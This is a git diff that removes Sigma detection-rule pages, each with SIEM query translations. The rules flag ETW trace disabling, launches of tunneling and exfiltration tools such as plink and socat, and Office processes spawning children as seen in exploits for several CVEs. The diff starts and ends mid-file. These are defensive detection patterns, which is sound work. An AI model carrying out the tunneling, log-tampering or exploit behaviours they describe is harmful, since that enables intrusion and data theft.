-    "query": "(winlog.event_data.CommandLine.keyword:*\\ cl\\ *\\/Trace* OR winlog.event_data.CommandLine.keyword:*\\ clear\\-log\\ *\\/Trace* OR winlog.event_data.CommandLine.keyword:*\\ sl*\\ \\/e\\:false* OR winlog.event_data.CommandLine.keyword:*\\ set\\-log*\\ \\/e\\:false*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*\\ cl\\ *\\/Trace* OR winlog.event_data.CommandLine.keyword:*\\ clear\\-log\\ *\\/Trace* OR winlog.event_data.CommandLine.keyword:*\\ sl*\\ \\/e\\:false* OR winlog.event_data.CommandLine.keyword:*\\ set\\-log*\\ \\/e\\:false*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Disable of ETW Trace'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:* cl *\/Trace* OR CommandLine.keyword:* clear\-log *\/Trace* OR CommandLine.keyword:* sl* \/e\:false* OR CommandLine.keyword:* set\-log* \/e\:false*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* cl */Trace*" OR CommandLine="* clear-log */Trace*" OR CommandLine="* sl* /e:false*" OR CommandLine="* set-log* /e:false*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (CommandLine="* cl */Trace*" OR CommandLine="* clear-log */Trace*" OR CommandLine="* sl* /e:false*" OR CommandLine="* set-log* /e:false*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*.* cl .*/Trace.*|.*.* clear-log .*/Trace.*|.*.* sl.* /e:false.*|.*.* set-log.* /e:false.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exfiltration_and_tunneling_tools_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_exfiltration_and_tunneling_tools_execution.md
deleted file mode 100644
index 07966e9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_exfiltration_and_tunneling_tools_execution.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Exfiltration and Tunneling Tools Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Execution of well known tools for data exfiltration and tunneling |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1020: Automated Exfiltration](https://attack.mitre.org/techniques/T1020)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate Administrator using tools</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Daniil Yugoslavskiy, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Exfiltration and Tunneling Tools Execution
-id: c75309a3-59f8-4a8d-9c2c-4c927ad50555
-description: Execution of well known tools for data exfiltration and tunneling
-status: experimental
-author: Daniil Yugoslavskiy, oscd.community
-date: 2019/10/24
-tags:
-    - attack.exfiltration
-    - attack.t1020
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith:
-            - '\plink.exe'
-            - '\socat.exe'
-            - '\stunnel.exe'
-            - '\httptunnel.exe'
-    condition: selection
-falsepositives:
-    - Legitimate Administrator using tools
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\plink.exe" -or $_.message -match "Image.*.*\\socat.exe" -or $_.message -match "Image.*.*\\stunnel.exe" -or $_.message -match "Image.*.*\\httptunnel.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:(*\\plink.exe OR *\\socat.exe OR *\\stunnel.exe OR *\\httptunnel.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c75309a3-59f8-4a8d-9c2c-4c927ad50555 <<EOF
-{
-  "metadata": {
-    "title": "Exfiltration and Tunneling Tools Execution",
-    "description": "Execution of well known tools for data exfiltration and tunneling",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1020"
-    ],
-    "query": "winlog.event_data.Image.keyword:(*\\\\plink.exe OR *\\\\socat.exe OR *\\\\stunnel.exe OR *\\\\httptunnel.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:(*\\\\plink.exe OR *\\\\socat.exe OR *\\\\stunnel.exe OR *\\\\httptunnel.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Exfiltration and Tunneling Tools Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:(*\\plink.exe *\\socat.exe *\\stunnel.exe *\\httptunnel.exe)
-```
-
-
-### splunk
-    
-```
-(Image="*\\plink.exe" OR Image="*\\socat.exe" OR Image="*\\stunnel.exe" OR Image="*\\httptunnel.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\plink.exe", "*\\socat.exe", "*\\stunnel.exe", "*\\httptunnel.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\plink\.exe|.*.*\socat\.exe|.*.*\stunnel\.exe|.*.*\httptunnel\.exe)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2015_1641.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2015_1641.md
deleted file mode 100644
index 2a3b981..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2015_1641.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Exploit for CVE-2015-1641       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/](https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/)</li><li>[https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100](https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Exploit for CVE-2015-1641
-id: 7993792c-5ce2-4475-a3db-a3a5539827ef
-status: experimental
-description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
-references:
-    - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
-    - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
-author: Florian Roth
-date: 2018/02/22
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\WINWORD.EXE'
-        Image: '*\MicroScMgmt.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\WINWORD.EXE" -and $_.message -match "Image.*.*\\MicroScMgmt.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\WINWORD.EXE AND winlog.event_data.Image.keyword:*\\MicroScMgmt.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7993792c-5ce2-4475-a3db-a3a5539827ef <<EOF
-{
-  "metadata": {
-    "title": "Exploit for CVE-2015-1641",
-    "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\WINWORD.EXE AND winlog.event_data.Image.keyword:*\\\\MicroScMgmt.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\WINWORD.EXE AND winlog.event_data.Image.keyword:*\\\\MicroScMgmt.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Exploit for CVE-2015-1641'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\WINWORD.EXE AND Image.keyword:*\\MicroScMgmt.exe)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\WINWORD.EXE" Image="*\\MicroScMgmt.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\WINWORD.EXE" Image="*\\MicroScMgmt.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\WINWORD\.EXE)(?=.*.*\MicroScMgmt\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_0261.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_0261.md
deleted file mode 100644
index b18172d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_0261.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Exploit for CVE-2017-0261       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html](https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Exploit for CVE-2017-0261
-id: 864403a1-36c9-40a2-a982-4c9a45f7d833
-status: experimental
-description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
-references:
-    - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html
-author: Florian Roth
-date: 2018/02/22
-tags:
-  - attack.defense_evasion
-  - attack.privilege_escalation
-  - attack.t1055
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\WINWORD.EXE'
-        Image: '*\FLTLDR.exe*'
-    condition: selection
-falsepositives:
-    - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\WINWORD.EXE" -and $_.message -match "Image.*.*\\FLTLDR.exe.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\WINWORD.EXE AND winlog.event_data.Image.keyword:*\\FLTLDR.exe*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/864403a1-36c9-40a2-a982-4c9a45f7d833 <<EOF
-{
-  "metadata": {
-    "title": "Exploit for CVE-2017-0261",
-    "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.privilege_escalation",
-      "attack.t1055"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\WINWORD.EXE AND winlog.event_data.Image.keyword:*\\\\FLTLDR.exe*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\WINWORD.EXE AND winlog.event_data.Image.keyword:*\\\\FLTLDR.exe*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Exploit for CVE-2017-0261'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\WINWORD.EXE AND Image.keyword:*\\FLTLDR.exe*)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\WINWORD.EXE" Image="*\\FLTLDR.exe*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\WINWORD.EXE" Image="*\\FLTLDR.exe*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\WINWORD\.EXE)(?=.*.*\FLTLDR\.exe.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_11882.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_11882.md
deleted file mode 100644
index 738e6e4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_11882.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Droppers Exploiting CVE-2017-11882       |
-|:-------------------------|:------------------|
-| **Description**          | Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1211: Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100](https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100)</li><li>[https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw](https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Droppers Exploiting CVE-2017-11882
-id: 678eb5f4-8597-4be6-8be7-905e4234b53a
-status: experimental
-description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
-references:
-    - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100
-    - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw
-author: Florian Roth
-date: 2017/11/23
-tags:
-    - attack.defense_evasion
-    - attack.t1211
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\EQNEDT32.EXE'
-    condition: selection
-fields:
-    - CommandLine
-falsepositives:
-    - unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\EQNEDT32.EXE") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.ParentImage.keyword:*\\EQNEDT32.EXE
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/678eb5f4-8597-4be6-8be7-905e4234b53a <<EOF
-{
-  "metadata": {
-    "title": "Droppers Exploiting CVE-2017-11882",
-    "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1211"
-    ],
-    "query": "winlog.event_data.ParentImage.keyword:*\\\\EQNEDT32.EXE"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.ParentImage.keyword:*\\\\EQNEDT32.EXE",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Droppers Exploiting CVE-2017-11882'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nCommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-ParentImage.keyword:*\\EQNEDT32.EXE
-```
-
-
-### splunk
-    
-```
-ParentImage="*\\EQNEDT32.EXE" | table CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\EQNEDT32.EXE")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\EQNEDT32\.EXE'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_8759.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_8759.md
deleted file mode 100644
index 46860a6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2017_8759.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | Exploit for CVE-2017-8759       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1203: Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100](https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100)</li><li>[https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100](https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Exploit for CVE-2017-8759
-id: fdd84c68-a1f6-47c9-9477-920584f94905
-description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
-references:
-    - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
-    - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
-tags:
-    - attack.execution
-    - attack.t1203
-author: Florian Roth
-date: 2017/09/15
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\WINWORD.EXE'
-        Image: '*\csc.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\WINWORD.EXE" -and $_.message -match "Image.*.*\\csc.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\WINWORD.EXE AND winlog.event_data.Image.keyword:*\\csc.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fdd84c68-a1f6-47c9-9477-920584f94905 <<EOF
-{
-  "metadata": {
-    "title": "Exploit for CVE-2017-8759",
-    "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759",
-    "tags": [
-      "attack.execution",
-      "attack.t1203"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\WINWORD.EXE AND winlog.event_data.Image.keyword:*\\\\csc.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\WINWORD.EXE AND winlog.event_data.Image.keyword:*\\\\csc.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Exploit for CVE-2017-8759'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\WINWORD.EXE AND Image.keyword:*\\csc.exe)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\WINWORD.EXE" Image="*\\csc.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\WINWORD.EXE" Image="*\\csc.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\WINWORD\.EXE)(?=.*.*\csc\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2019_1378.md b/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2019_1378.md
deleted file mode 100644
index fe457dd..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2019_1378.md
+++ /dev/null
@@ -1,182 +0,0 @@
